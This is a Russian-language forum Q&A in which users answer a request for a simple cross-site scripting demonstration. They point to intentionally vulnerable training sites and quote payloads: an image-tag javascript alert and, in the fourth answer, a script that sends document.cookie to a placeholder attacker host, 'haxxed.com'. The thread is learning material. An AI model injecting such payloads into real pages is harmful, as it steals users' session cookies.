Может ли кто-нибудь показать мне атаку Cross-Site scripting в моем браузере? Есть ли пример в Интернете, который делает это? Я не нашел это в Интернете.
Чем проще пример, тем лучше.
Простой пример атаки на межсайтовый скриптинг
Ответ 1
См. http://www.insecurelabs.org и http://www.insecurelabs.org/task/
Умышленно уязвим для XSS в поле поиска и в нескольких других местах.
Ответ 2
Обычно вам нужно установить собственное серверное программное обеспечение для примера XSS. Не многие легитимные сайты откроют XSS-недостаток намеренно веб-серфингистам.
Одна готовая часть серверного программного обеспечения, которая позволяет вам продемонстрировать XSS (среди многих других) для себя, - это OWASP WebGoat. Ниже приведены инструкции для установки WebGoat и демонстрации XSS. Вы найдете дополнительные примеры фрагментов программ, которые позволяют XSS в статье OWASP " Межсайтовый скриптинг (XSS).
Ответ 3
<img src="javascript:alert('hello everybody')"></img>
Тег изображения, который я вставил, является примером xss. приведенный выше src содержит java script, предупреждающий вас.
Ответ 4
Простая форма также будет: Если появится окно сообщения, вы знаете, что страница или сервер уязвимы.
<script>window.location = 'haxxed.com? cookie=' + document.cookie</script>
Здесь можно найти отличный пример того, как работает эта техника. https://www.hacksplaining.com/exercises/xss-stored